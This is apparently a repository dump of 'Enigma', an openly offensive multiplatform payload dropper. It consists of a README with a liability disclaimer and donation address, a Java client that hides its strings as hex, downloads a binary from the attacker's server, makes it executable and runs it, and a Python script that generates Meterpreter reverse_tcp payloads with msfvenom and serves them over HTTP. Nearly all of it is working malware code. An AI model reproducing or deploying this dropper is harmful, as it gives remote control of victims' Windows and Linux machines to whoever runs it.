10 | 3 | Multiplatform payload dropper. 4 |
5 | 6 | ## VIDEO DEMO 7 |
8 |
9 |
10 |
29 | TO BE USED FOR EDUCATIONAL PURPOSES ONLY 30 |
31 | 32 | The use of the Enigma is COMPLETE RESPONSIBILITY of the END-USER. Developer assume NO liability and are NOT responsible for any misuse or damage caused by this program. 33 | 34 | "DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 35 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 36 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 37 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 38 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 39 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 40 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE." 41 | Taken from [LICENSE](LICENSE). 42 | 43 | ### PREREQUISITES 44 | 45 | * python 2.7 for enigma.py 46 | * python 3.x for enigma.py 47 | * metasploit 48 | * msfvenom 49 | 50 | ## TESTED ON 51 | [](https://www.kali.org) **Kali Linux - ROLLING EDITION** 52 | 53 | ## Donation 54 | If you liked our work and want to support us, you can donate :D 55 | 56 |
57 |
58 | Bitcoin Address: 1EmJ5KiAKzpyqGGHopAq9qukrVPS47T9bA
59 |
60 | ### SCREENSHOT
61 | 
62 |
--------------------------------------------------------------------------------
/Clients/esposaDropper/src/esposaDropper/EsposaDropper.java:
--------------------------------------------------------------------------------
1 | package esposaDropper;
2 |
3 | import java.io.BufferedInputStream;
4 | import java.io.File;
5 | import java.io.FileOutputStream;
6 | import java.io.IOException;
7 | import java.net.MalformedURLException;
8 | import java.net.URL;
9 |
10 | public class EsposaDropper {
11 |
12 | private static String amd64 = "616d643634";
13 | private static String arch;
14 | private static String OS;
15 | private static String windows = "77696e646f7773";
16 | private static String linux = "6c696e7578";
17 | private static String droped;
18 | private static String url = "687474703a2f2f25732f25732f2573";
19 | private static String host = "3132372e302e302e31";
20 |
21 | /**
22 | * Esposa quer saber a arquitetura do sistema operacional
23 | *
24 | * @return String
25 | */
26 | private static void setArch() {
27 | if (System.getProperty(ahamTah("6f732e61726368")).equals(ahamTah(amd64))) {
28 | arch = ahamTah("783634");
29 | } else {
30 | arch = ahamTah("783836");
31 | }
32 | }
33 |
34 | /**
35 | * Esposa quer saber seu sistema operacional
36 | *
37 | * @return String
38 | */
39 | private static void setSO() {
40 | String so = System.getProperty(ahamTah("6f732e6e616d65")).toLowerCase();
41 | if (so.indexOf(ahamTah("77696e")) >= 0) {
42 | OS = ahamTah(windows);
43 | } else if (so.indexOf(ahamTah("6e6978")) >= 0 || so.indexOf(ahamTah("6e7578")) >= 0
44 | || so.indexOf(ahamTah("616978")) > 0) {
45 | OS = ahamTah(linux);
46 | } else {
47 | OS = ahamTah("646573636f6e68656369646f");
48 | System.exit(0);
49 | }
50 |
51 | if (OS.equals(ahamTah(windows))) {
52 | droped = ahamTah("77696e2e657865");
53 | } else if (OS.equals(ahamTah(linux))) {
54 | droped = ahamTah("6c696e2e656c66");
55 | }
56 | }
57 |
58 | /**
59 | * Esposa implanta o arquivo no seu computador
60 | *
61 | * @throws IOException
62 | * @throws MalformedURLException
63 | */
64 | private static void implantar() throws MalformedURLException, IOException {
65 | url = String.format(ahamTah(url), ahamTah(host), arch, droped);
66 | BufferedInputStream in = null;
67 | FileOutputStream fout = null;
68 | String local = System.getProperty(ahamTah("6a6176612e696f2e746d70646972")) + File.separator + droped;
69 | try {
70 | in = new BufferedInputStream(new URL(url).openStream());
71 | fout = new FileOutputStream(local);
72 |
73 | final byte data[] = new byte[1024];
74 | int count;
75 | while ((count = in.read(data, 0, 1024)) != -1) {
76 | fout.write(data, 0, count);
77 | }
78 | } finally {
79 | if (in != null) {
80 | in.close();
81 | }
82 | if (fout != null) {
83 | fout.close();
84 | }
85 | }
86 | new File(local).setExecutable(true);
87 | Runtime.getRuntime().exec(local);
88 | //desquite();
89 | }
90 |
91 | /**
92 | * Esposa pede desquite
93 | *
94 | * @throws IOException
95 | */
96 | private static void desquite() throws IOException {
97 | String del = new java.io.File(".").getCanonicalPath() + File.separator + EsposaDropper.class.getSimpleName()
98 | + ahamTah("2e6a617661");
99 | new File(del).delete();
100 | }
101 |
102 | /**
103 | * Traduz o que esposa fala
104 | *
105 | * @param blaBlaBla
106 | * @return String
107 | */
108 | private static String ahamTah(String blaBlaBla) {
109 | StringBuilder str = new StringBuilder();
110 | for (int i = 0; i < blaBlaBla.length(); i += 2) {
111 | str.append((char) Integer.parseInt(blaBlaBla.substring(i, i + 2), 16));
112 | }
113 | return str.toString();
114 | }
115 |
116 | public static void main(String[] args) throws MalformedURLException, IOException {
117 | iniciarVariaveis();
118 | implantar();
119 | }
120 |
121 | /**
122 | * Faz a esposa inicializar as variaveis
123 | */
124 | private static void iniciarVariaveis() {
125 | setArch();
126 | setSO();
127 | }
128 | }
129 |
--------------------------------------------------------------------------------
/enigma.py:
--------------------------------------------------------------------------------
1 | #-*- coding: utf-8 -*-
2 | #------------------------------------------------------
3 | #
4 | # BY: UNDEADSEC from BRAZIL :)
5 | # Visit: https://www.youtube.com/c/UndeadSec
6 | # Github: https://github.com/UndeadSec/EvilURL
7 | #------------------------------------------------------
8 | from subprocess import call
9 | from time import sleep
10 | from os import geteuid
11 | from sys import exit
12 |
13 | if not geteuid() == 0:
14 | exit('Enigma must be run as root')
15 | RED, WHITE, YELLOW, CIANO, GREEN, END = '\033[91m', '\33[46m', '\33[93m', '\33[36m', '\033[1;32m', '\033[0m'
16 | def message():
17 | call('clear', shell=True)
18 | print '''
19 | {1}:::::::::: :::: ::: ::::::::::: :::::::: :::: :::: :::
20 | :+: :+:+: :+: :+: :+: :+: +:+:+: :+:+:+ :+: :+:
21 | +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+:+ +:+ +:+ +:+
22 | +#++:++# +#+ +:+ +#+ +#+ :#: +#+ +:+ +#+ +#++:++#++: {0}
23 | +#+ +#+ +#+#+# +#+ +#+ +#+# +#+ +#+ +#+ +#+
24 | #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+#
25 | ########## ### #### ########### ######## ### ### ### ###
26 | {1}DROPPER
27 | by: UNDEADSEC from BRazil'''.format(CIANO, END)
28 | def runServer():
29 | print '\n {0}[{1}*{0}]{1} Starting Server... {2}H4ppy h4ck1ng {1}:)'.format(CIANO, END, GREEN)
30 | sleep(3)
31 | call('cd Server && python -m SimpleHTTPServer 80', shell=True)
32 |
33 | def generatePayloads():
34 | call('rm -Rf Server/x64/* && rm -Rf Server/x86/*', shell=True)
35 | payloadLHOST= raw_input('\n {0}[{1}~{0}]{1} Insert your payload LHOST: '.format(CIANO, END))
36 | payloadLPORT= raw_input('\n {0}[{1}~{0}]{1} Insert your payload LPORT: '.format(CIANO, END))
37 | print '\n {0}[{1}~{0}]{1} Generating Payloads...'.format(CIANO, END)
38 | call('msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=' + payloadLHOST + ' LPORT=' + payloadLPORT + ' -f elf -o Server/x64/lin.elf', shell=True)
39 | call('msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=' + payloadLHOST + ' LPORT=' + payloadLPORT + ' -f elf -o Server/x86/lin.elf', shell=True)
40 | call('msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=' + payloadLHOST + ' LPORT=' + payloadLPORT + ' -f exe -o Server/x64/win.exe', shell=True)
41 | call('msfvenom -p windows/meterpreter/reverse_tcp LHOST=' + payloadLHOST + ' LPORT=' + payloadLPORT + ' -f exe -o Server/x86/win.exe', shell=True)
42 |
43 | def generateClient():
44 | lhost= raw_input('\n {0}[{1}~{0}]{1} Insert your LHOST: '.format(CIANO, END))
45 | template = open('Clients/sister.py', 'r')
46 | template = template.read()
47 | new = open('Output/sister.py', 'w')
48 | new.write('#!/usr/bin/python\n# -*- coding: utf-8 -*-\nhost = \'' + lhost + '\'\n')
49 | new.write(template)
50 | print '\n {0}[{1}~{0}]{1} Generating Clients...'.format(CIANO, END)
51 | sleep(3)
52 | print '\n {0}[{1}*{0}]{1} Process done.\n\n {2}[{1}*{2}] Clients saved to Output/{1}'.format(CIANO, END, GREEN)
53 |
54 | def init():
55 | call('rm -Rf Server/x64/* && rm -Rf Server/x86/*', shell=True)
56 | print '\n {0}[{1}~{0}]{1} Arranging the house...'.format(CIANO, END)
57 | sleep(3)
58 | call('cp ' + win64 + ' Server/x64/win.exe', shell=True)
59 | call('cp ' + win86 + ' Server/x86/win.exe', shell=True)
60 | call('cp ' + lin64 + ' Server/x64/lin.elf', shell=True)
61 | call('cp ' + lin86 + ' Server/x86/lin.elf', shell=True)
62 | print '\n {0}[{1}*{0}]{1} Process done.'.format(CIANO, END)
63 |
64 | def main():
65 | global win64, win86, lin64, lin86, mac64, mac86
66 | print ' Select an option:\n\n {0}[{1}1{0}]{1} Insert your custom payloads -> Recommended\n\n {0}[{1}2{0}]{1} Generate payloads with metasploit'.format(CIANO, END)
67 | ask = raw_input('\n{0} EN1GM4 {1}> '.format(CIANO, END))
68 | if ask == '1':
69 | win64 = raw_input('\n {0}[{1}1{0}/{1}4{0}]{1} Insert Windows Payload x64 file path: '.format(CIANO, END))
70 | win86 = raw_input('\n {0}[{1}2{0}/{1}4{0}]{1} Insert Windows Payload x86 file path: '.format(CIANO, END))
71 | lin64 = raw_input('\n {0}[{1}3{0}/{1}4{0}]{1} Insert Linux Payload x64 file path: '.format(CIANO, END))
72 | lin86 = raw_input('\n {0}[{1}4{0}/{1}4{0}]{1} Insert Linux Payload x86 file path: '.format(CIANO, END))
73 | init()
74 | if ask == '2':
75 | generatePayloads()
76 | generateClient()
77 | runServer()
78 |
79 | message()
80 | main()
81 |
--------------------------------------------------------------------------------